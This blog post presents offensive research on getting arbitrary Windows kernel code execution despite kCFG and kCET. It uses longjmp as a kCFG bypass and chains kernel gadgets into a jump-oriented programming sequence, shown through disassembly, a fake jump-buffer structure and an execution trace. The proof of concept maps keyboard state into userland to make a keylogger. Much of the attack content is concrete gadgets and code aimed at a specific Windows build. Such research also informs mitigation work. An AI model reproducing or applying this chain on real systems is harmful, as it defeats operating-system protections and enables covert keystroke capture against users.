Code reuse in the age of kCET and HVCI

With the recent evolution of the Windows kernel, multiple mitigations and hardening measures have been introduced to prevent arbitrary kernel code execution. First, HVCI ensures at the hypervisor level that only signed drivers can be loaded into the kernel. To prevent the allocation of new executable pages, Extended Page Tables are used: new executable pages can only be created with the cooperation of the hypervisor, which requires some form of code signature.

Then, to ensure that already loaded code cannot be reused, Control-Flow Integrity is enforced using two different mechanisms. kCFG is a software implementation of CFI used to protect forward edges; it relies on a bitmap of valid call targets, a bitmap that is itself protected by the hypervisor. Backward edges are protected by kCET, the Windows support for Intel CET, a hardware implementation of a shadow stack that protects return addresses on the stack from tampering.

All of these mechanisms are described in this blogpost, which I recommend reading.

The addition of kCET makes techniques such as KernelForge non-functional: KernelForge would craft a ROP chain on the stack of a dummy thread to chain arbitrary function calls.

In this blogpost, I wanted to explore whether kernel code execution was still possible, or if data-only attacks are now the only way to go.

Breaking forward-edge integrity

While kCET seems pretty robust, kCFG is not as robust as Intel IBT, the hardware implementation of forward-edge CFI. As such, techniques like Jump-Oriented Programming (JOP) can get around kCET, but the first gadget in the chain is unlikely to be a valid call target. Therefore, we need to get around kCFG once; afterwards, it is no longer a concern during the execution of the JOP chain.

kCFG can only maintain the integrity of the control flow if every call site is instrumented. In practice, however, it is not uncommon to find unprotected indirect calls or jumps in the Windows kernel.

To discover interesting functions that lead to unprotected call sites with attacker-controlled data, I experimented with two different approaches. The first was manually inspecting control-flow-related functions, in particular functions that can modify the control flow in ways that are unpredictable at compile time, such as exceptions and goto. The second was symbolic execution with the miasm framework.

Symbolic execution

I wrote a quick script that lists all valid call targets of ntoskrnl.exe and runs symbolic execution on each function. The execution stops when the instruction pointer can no longer be solved, and the script logs the expression that determines its value. I then filtered the results to keep only the functions where the instruction pointer depends on the arguments given to the function.

This yielded some interesting results. Below I show some candidates that could be used, depending on the primitive you have:

KiDpcDispatch xors a buffer pointed to by RCX with RDX, then computes the address of a kernel function, writes a value to that address, and jumps to it. The expression returned by miasm is the following: (@64[@64[RCX + 0x40] + 0x20] ^ @64[@64[RCX + 0x40] + 0x40]) | 0xFFFF800000000000.

KiDpcDispatch
xor        qword ptr [rcx + 0x48], rdx
xor        qword ptr [rcx + 0x50], rdx
add        rcx, 0x48
xor        qword ptr [rcx + 0x10], rdx
xor        qword ptr [rcx + 0x18], rdx
xor        qword ptr [rcx + 0x20], rdx
xor        qword ptr [rcx + 0x28], rdx
xor        qword ptr [rcx + 0x30], rdx
xor        qword ptr [rcx + 0x38], rdx
xor        qword ptr [rcx + 0x40], rdx
xor        qword ptr [rcx + 0x48], rdx
xor        qword ptr [rcx + 0x50], rdx
xor        qword ptr [rcx + 0x58], rdx
xor        qword ptr [rcx + 0x60], rdx
xor        qword ptr [rcx + 0x68], rdx
xor        qword ptr [rcx + 0x70], rdx
xor        qword ptr [rcx + 0x78], rdx
xor        qword ptr [rcx + 0x80], rdx
xor        qword ptr [rcx + 0x88], rdx
xor        qword ptr [rcx + 0x90], rdx
xor        qword ptr [rcx + 0x98], rdx
xor        qword ptr [rcx + 0xa0], rdx
xor        qword ptr [rcx + 0xa8], rdx
xor        qword ptr [rcx + 0xb0], rdx
xor        qword ptr [rcx + 0xb8], rdx
xor        qword ptr [rcx + 0xc0], rdx
xor        dword ptr [rcx], edx
sub        rcx, 0x48
mov        r8, qword ptr [rcx + 0x40]
mov        r10, qword ptr [r8 + 0x40]
mov        rdx, 0xffff800000000000
mov        r9, qword ptr [r8 + 0x20]
xor        r10, r9
or         r10, rdx
mov        rdx, 0x85131481131482e
mov        rcx, rdx
xor        rdx, qword ptr [r10]
mov        dword ptr [r10], ecx
mov        rcx, r10
jmp        rcx

RtlLookupFunctionEntryEx calls the value (RCX - 0x1000) + *(RCX - 0x1000 + 0x7E8):

RtlLookupFunctionEntryEx
xor        qword ptr cs:[rcx], rdx
xor        qword ptr [rcx + 0x8], rdx
lea        rdx, [rcx - 0x1000]
mov        eax, dword ptr [rdx + 0x7e8]
add        rax, rdx
sub        rsp, 0x28
call       rax
add        rsp, 0x28
mov        r8, qword ptr [rax + 0x110]
lea        rcx, [rax + 0x798]
mov        edx, 0x1
jmp        r8

RtlpExecuteHandlerForException simply calls a pointer read from its 4th argument (*(r9 + 0x30)):

RtlpExecuteHandlerForException
sub        rsp, 0x28
mov        qword ptr [rsp + 0x20], r9
mov        rax, qword ptr [r9 + 0x30]
call       rax
nop        dword ptr [rax]
nop
add        rsp ,0x28
ret

Despite having very different names, KiDpcDispatch and RtlLookupFunctionEntryEx have something in common: they are both Patchguard functions with intentionally confusing names! :)

KiDpcDispatch is not suitable for our needs, since it requires RWX memory: the last few instructions write to the jump target before jumping to it.

RtlLookupFunctionEntryEx could work, but would require carefully calculating the value of the 1st argument, so that the initial write operations end up targeting writable memory.

Finally, RtlpExecuteHandlerForException redirects the control flow to a pointer read from its 4th parameter, with a call instruction. This can also work, depending on the primitive you have.

Overall, I think symbolic execution has a lot of potential for identifying interesting functions to get around kCFG: even without much knowledge of the topic, I was quickly able to find valid candidates. My implementation was also very limited - if a function contained a direct call, the symbolic execution would stop rather than recursively execute the callee - and I still found multiple candidates.

longjmp

While manually searching for interesting functions, I decided to look at the implementation of longjmp:

void longjmp(jmp_buf env, int value)
{
  KeCheckStackAndTargetAddress(env->Rip, env->Rsp);
  __longjmp_internal(env, value);
  return;
}

The __longjmp_internal function performs the actual longjmp - it restores nonvolatile registers from the env parameter and jumps to the Rip value, without any CFG check:

...
mov rax, rdx
mov rbx, qword [rcx + 8]
mov rsi, qword [rcx + 0x20]
mov rdi, qword [rcx + 0x28]
mov r12, qword [rcx + 0x30]
mov r13, qword [rcx + 0x38]
mov r14, qword [rcx + 0x40]
mov r15, qword [rcx + 0x48]
ldmxcsr dword [rcx + 0x58]
movdqa xmm6, xmmword [rcx + 0x60]
movdqa xmm7, xmmword [rcx + 0x70]
movdqa xmm8, xmmword [rcx + 0x80]
movdqa xmm9, xmmword [rcx + 0x90]
movdqa xmm10, xmmword [rcx + 0xa0]
movdqa xmm11, xmmword [rcx + 0xb0]
movdqa xmm12, xmmword [rcx + 0xc0]
movdqa xmm13, xmmword [rcx + 0xd0]
movdqa xmm14, xmmword [rcx + 0xe0]
movdqa xmm15, xmmword [rcx + 0xf0]
mov rdx, qword [rcx + 0x50]
mov rbp, qword [rcx + 0x18]
mov rsp, qword [rcx + 0x10]
jmp rdx

This would be an ideal function to call to bypass the requirements of kCFG, but __longjmp_internal is not a valid call target. However, longjmp is a valid call target, so let’s review KeCheckStackAndTargetAddress to see what constraints we have:

void KeCheckStackAndTargetAddress(size_t Rip, size_t Rsp)
{
  size_t StackLimit = 0;
  size_t StackBase = 0;
  if (Rip >= 0x8000000000000000)
  {
    BOOL success = KeQueryCurrentStackInformationEx(Rsp, unused, &StackBase, &StackLimit);
    if (((success != FALSE) && (StackBase <= Rsp)) && (Rsp < StackLimit))
      return;
  }
  __debugbreak();
}

Regarding the new RIP value, the only constraint is that it is a kernel address, so no real issue here. The new RSP value has a constraint: it must be within the bounds of the kernel stack of the current thread.

Starting with version 24H2, new restrictions on KASLR leaks are in place, which would prevent unprivileged users from getting an easy kernel stack address leak. While this can be an issue for exploiting a privilege escalation vulnerability, this isn’t a problem when targeting “admin-to-kernel” scenarios.

This makes longjmp an interesting function to call to break the forward-edge integrity enforced by kCFG, provided you control its 1st argument and have a kernel stack address leak.
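
For reference, here is a minimal sketch of the fake jmp_buf handed to longjmp, with the field offsets taken from the __longjmp_internal disassembly above. The structure and field names are illustrative, not the official _JUMP_BUFFER definition; only the offsets matter.

#include <stdint.h>

// Illustrative layout only - the offsets mirror the loads performed by
// __longjmp_internal above. The buffer must be 16-byte aligned, since the
// xmm registers are restored with movdqa.
typedef struct _FAKE_JMP_BUF {
    uint64_t Frame;             // +0x00, not read by __longjmp_internal
    uint64_t Rbx;               // +0x08
    uint64_t Rsp;               // +0x10, must lie within the current thread's kernel stack
    uint64_t Rbp;               // +0x18
    uint64_t Rsi;               // +0x20
    uint64_t Rdi;               // +0x28
    uint64_t R12;               // +0x30
    uint64_t R13;               // +0x38
    uint64_t R14;               // +0x40
    uint64_t R15;               // +0x48
    uint64_t Rip;               // +0x50, any kernel-mode address passes KeCheckStackAndTargetAddress
    uint32_t MxCsr;             // +0x58
    uint32_t Reserved;          // +0x5C
    uint8_t  Xmm6to15[10][16];  // +0x60 .. +0xF0
} FAKE_JMP_BUF;

// Rip is set to the first JOP gadget, Rsp to a leaked kernel stack address of
// the current thread, and the remaining nonvolatile registers are preloaded
// with whatever the first gadget expects.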

Crafting a JOP chain

Now that kCFG is no longer a concern, we can start reusing kernel code by jumping to a gadget in the middle of a function (or even in the middle of an instruction), just like in a standard ROP chain. The gadget cannot end in a ret, because kCET is still in place; instead, it must end with an indirect jmp or call.

Unlike ROP chains, JOP chains have an additional difficulty: there is nothing maintaining and updating the state of the execution of the chain. After a gadget executes, nothing makes the control flow go to the next gadget. While it is possible to prepare the register used in the indirect jmp or call at the end of a gadget so that it branches directly to the next gadget, this doesn't scale as the chain gets bigger: it would require preparing too many registers and would create additional constraints on the gadgets themselves. Given that JOP gadgets are also less convenient than ROP gadgets, this quickly makes building the JOP chain too complex, so an alternative solution is needed.

In a ROP chain, this is handled implicitly: when the ret instruction at the end of a gadget executes, the control flow goes to the next gadget and, at the same time, the stack pointer gets updated so that it now points to the following gadget.

To replicate this behavior when creating a JOP chain, one can use a “dispatcher” gadget, whose role is to link together all the pieces of the JOP chain. When the execution of any gadget completes, the execution must come back to the dispatcher gadget, which will update the state of the JOP chain, and jump to the next gadget.

This gadget is crucial, and will affect the design of the entire chain of gadgets, so finding this gadget first is a good idea.

JOP dispatchers

I identified two gadgets that could fulfill my requirements. The first one corresponds to the nt!HalpLMIdentityStub symbol:

mov edi, edi
mov rcx, qword [rdi + 0x70]
mov rax, qword [rdi + 0xa0]
mov rdi, qword [rdi + 0x78]
jmp rcx

This could work starting from the first instruction, abusing the fact that SMAP is not enabled in most contexts on Windows, or starting from the second instruction. In this dispatcher, rdi serves as the register that gets updated to hold the address of the next gadget. The downside of this gadget is that the rcx register gets clobbered with the address of our target gadgets, which is inconvenient when targeting functions with the fastcall convention, where rcx holds the first argument.

I initially used this gadget to build a working JOP chain, then switched to the gadget described below because it is more powerful - but it is clearly possible to build a JOP chain around this dispatcher.

The second gadget I found is located at the end of nt!_guard_retpoline_exit_indirect_rax:

call rax
mov rax, qword [rsp + 0x20]
mov rcx, qword [rsp + 0x28]
mov rdx, qword [rsp + 0x30]
mov r8, qword [rsp + 0x38]
mov r9, qword [rsp + 0x40]
add rsp, 0x48
jmp rax

This gadget is slightly different. This time, the register holding the address of the next gadget is rsp. If we could execute this in a loop, it would be perfect: we would call an arbitrary address, update the arguments, then jmp back to the call instruction. Unfortunately, both the jmp and call instructions use the rax register.

To get around this, we start the execution on the mov rax, qword [rsp + 0x20] instruction, prepare the arguments for our target function, then jump to a JOP gadget that can update rax without modifying other registers. I picked the following gadget: pop rax ; push rdi ; cmc ; jmp qword [rsi+0x3B] ;. Only the pop rax and jmp qword [rsi+0x3B] instructions are relevant; the others are side effects we have to live with, JOP gadgets being less convenient. The pop rax instruction loads rax with the address of the target function, read from the stack, and rsi is prepared beforehand so that *(rsi+0x3B) points to the call rax instruction. With this, we can loop around this gadget and call arbitrary addresses, while also controlling every argument.

There is also a big upside to this gadget: it uses a call instruction, which means it is possible to execute ret-ending gadgets, just like in a ROP chain! Typical ROP gadgets, for example pop rdi ; pop rsi ; ret ;, can work: rdi gets the return address pushed by the call rax instruction, rsi gets the value of interest, and the following value on the stack must be the address of the mov rax, qword [rsp + 0x20] instruction, to comply with kCET. This works because, fundamentally, Intel CET only checks that the return address taken from the stack matches the top of the shadow stack; it does not care which stack slot that address is read from, or where it was originally pushed.

With this, we can chain function calls and ROP gadgets.

Saving the return value & pivoting stacks

Now, the only thing that is missing is the ability to save and reuse the return value of function calls. The return value in rax immediately gets overwritten by the mov rax, qword [rsp + 0x20] instruction of our dispatcher.

To address this issue, the call rax instruction is not going to call the target function directly, but another gadget containing another call instruction. The one I picked is the following: call rbp ; jmp qword [rsi-0x77] ;. If rbp is set up to hold the address of the target function, we regain control of the execution right after the target function returns, before rax gets overwritten.

To save rax, I used this gadget:

mov qword [rsi], rax
mov rbx, qword [rsp+0x60]
mov rsi, qword [rsp+0x68]
add rsp, 0x50
pop rdi
ret

When it returns, kCET forces the return address to be the second instruction of the JOP dispatcher, but this is fine, because the return value has been saved at *rsi.

To actually reuse a return value, I split the JOP chain each time a return value needed to be reused. This way, I could memcpy the saved value into the next part of the payload, and use a pop rsp ; ret ; gadget to switch from one part of the payload to the next.

Here is a trace of the execution flow of the JOP chain:

mov rax, qword [rsp + 0x20] ; set arguments for function call, and rax to the address of the "pop rax" gadget
; ...
jmp rax
pop rax ; set rax to the address of the "call rbp ; jmp [rsi-0x77]" gadget 
; ...
jmp qword [rsi+0x3b] ; rsi previously set so that *(rsi+0x3b) points to the address of the "call rax" instruction in the jop dispatcher
call rax
	call rbp ; previously set to the target function
		nop ; (Start of the target function)
		; ...
		ret
	jmp qword [rsi-0x77] ; rsi previously set so that *(rsi-0x77) points to the address of the gadget used to save rax
	mov qword [rsi], rax ; return value gets saved at *rsi
	; ...
	ret
mov rax, qword [rsp + 0x20] ; start of the second dispatcher gadget
; ...
jmp rax
pop rax ; set rax to the address of "add rsp, 0x50 ; pop rbp ; ret" gadget
; ...
jmp qword [rsi+0x3b] ; rsi previously set so that *(rsi+0x3b) points to the address of the "call rax" instruction in the jop dispatcher
call rax
	add rsp, 0x50
	pop rbp ; set rbp to the address of the 2nd target function, memcpy if we want to reuse the result of the 1st function call
	ret
mov rax, qword [rsp + 0x20] ; set arguments for the 2nd function call, and rax to the address of the "pop rax" gadget
; ...
jmp rax
pop rax ; set rax to address of "call rbp ; jmp [rsi-0x77]" 
; ...
jmp qword [rsi+0x3b] ; rsi previously set so that *(rsi+0x3b) points to the address of call rax instruction in the jop dispatcher
call rax
	call rbp ; previously set to the 2nd target function
		nop ; (Start of the target function)
		; ...
		ret
	jmp qword [rsi-0x77] ; rsi previously set so that *(rsi-0x77) points to the address of the gadget used to save rax
	mov qword [rsi], rax ; return value gets saved at *rsi
	; ...
	ret
mov rax, qword [rsp + 0x20] ; start of the third dispatcher gadget
; ...

Finally, to avoid running into paging issues, where a part of the JOP chain isn't paged in - which would result in a crash, because page faults cannot be handled in this context - I placed all the parts of the payload in non-paged pool memory, using named pipe backing buffers.
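
As a quick illustration of the pipe trick, here is a minimal user-mode sketch, with an assumed helper name, of how a payload chunk can be kept resident in non-paged pool. How the kernel-side addresses of those buffers are then located is a separate concern, not covered here.

#include <windows.h>

// Minimal sketch: write a payload chunk into a pipe and never read it back.
// Pipes are backed by NPFS, whose write buffers live in non-paged pool, so
// the chunk cannot be paged out while the JOP chain runs. Error handling is
// omitted and pin_payload_chunk is just an illustrative helper name.
void pin_payload_chunk(const void *chunk, DWORD size, HANDLE handles[2])
{
    DWORD written = 0;

    // Both handles must stay open for the lifetime of the chain, otherwise
    // the backing buffer is freed.
    CreatePipe(&handles[0], &handles[1], NULL, size);
    WriteFile(handles[1], chunk, size, &written, NULL);
}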

With this, we have the ability to reuse kernel code to call arbitrary functions and execute ROP gadgets, and save and reuse return values - without ever breaking the constraints of kCET.

Is kernel code execution really useful?

Now that we can achieve code execution thanks to code reuse, let’s consider when it can be useful, compared to a data-only attack.

To me, there are two main cases where this can be useful.

The first use case is executing privileged instructions, and in particular, interacting with the hypervisor and VTL1. With a data-only attack, this might be done using race conditions, where the backing data of a message is replaced before it is sent, but that seems harder to implement and unreliable.

The second use case is dealing with complex data structures. For instance, in my proof of concept below, a data-only approach would have required creating and editing page table entries myself - it is much more convenient to call the corresponding APIs and have them do the work for you.

Finally, while this technique can achieve arbitrary kernel code execution, it cannot be started from a callback if none of the arguments are controlled. This makes it unsuitable for intercepting process creation notifications, for example.

Proof of concept

To demonstrate the technique, using the “admin-to-kernel” arbitrary call primitive offered by the KexecDDPlus tool, I chose to build a payload that maps the keyboard state into userland to create a keylogger, as described in the Close Encounters of the Advanced Persistent Kind presentation, which includes an example implementation on Windows 10. This would be tedious to implement using a data-only attack.

I happen to have a kCET-compatible CPU, so, using Hyper-V, I set up a Windows 11 test environment with kCET enabled:

Windows 11 setting to enable kCET

To start off the execution of the JOP chain, I used longjmp to get around kCFG, since the primitive offered by the tool's ioctl gives full control over rcx.

Then the execution of the JOP chain kicks off: the payload calls win32ksgd!SGDGetUserSessionState and adds a constant value to the result using a ROP gadget, to locate the map containing the state of the keyboard. Afterwards, an MDL describing the map is built with IoAllocateMdl, locked with MmProbeAndLockPages, and mapped to userland with MmMapLockedPagesSpecifyCache. Finally, the map is polled from userland to get a working keylogger.
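
To make that sequence easier to follow, here is the kernel-mode equivalent of what the JOP chain performs, written as plain C. The MDL routines are the documented APIs actually called by the chain; the SGDGetUserSessionState prototype and the offset/size parameters are assumptions standing in for the real, build-specific values.

#include <ntddk.h>

// Hypothetical C equivalent of the call sequence driven by the JOP chain.
extern PVOID SGDGetUserSessionState(void); // win32ksgd export, prototype assumed

PVOID MapKeyStateToUserland(SIZE_T keyStateOffset, ULONG keyStateSize)
{
    // Locate the keyboard state map inside the user session state
    // (the offset is added by a ROP gadget in the real chain)
    PVOID sessionState = SGDGetUserSessionState();
    PVOID keyStateMap = (PUCHAR)sessionState + keyStateOffset;

    // Describe the map with an MDL, lock the pages, then map them into the
    // calling process' address space. Error handling is omitted; a real
    // implementation would wrap MmProbeAndLockPages in __try/__except.
    PMDL mdl = IoAllocateMdl(keyStateMap, keyStateSize, FALSE, FALSE, NULL);
    MmProbeAndLockPages(mdl, KernelMode, IoReadAccess);

    return MmMapLockedPagesSpecifyCache(mdl, UserMode, MmCached,
                                        NULL, FALSE, NormalPagePriority);
}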

Demonstration of the keylogger on Windows 11

My implementation is available on GitHub. While the offsets target Windows 11 22H2, build version 22261.4890, the most important gadgets, such as the dispatcher, still exist on 24H2, and the others, while not all directly present, all have similar gadgets that could replace them.

With all this, I think it's clear that kernel code execution is not dead :)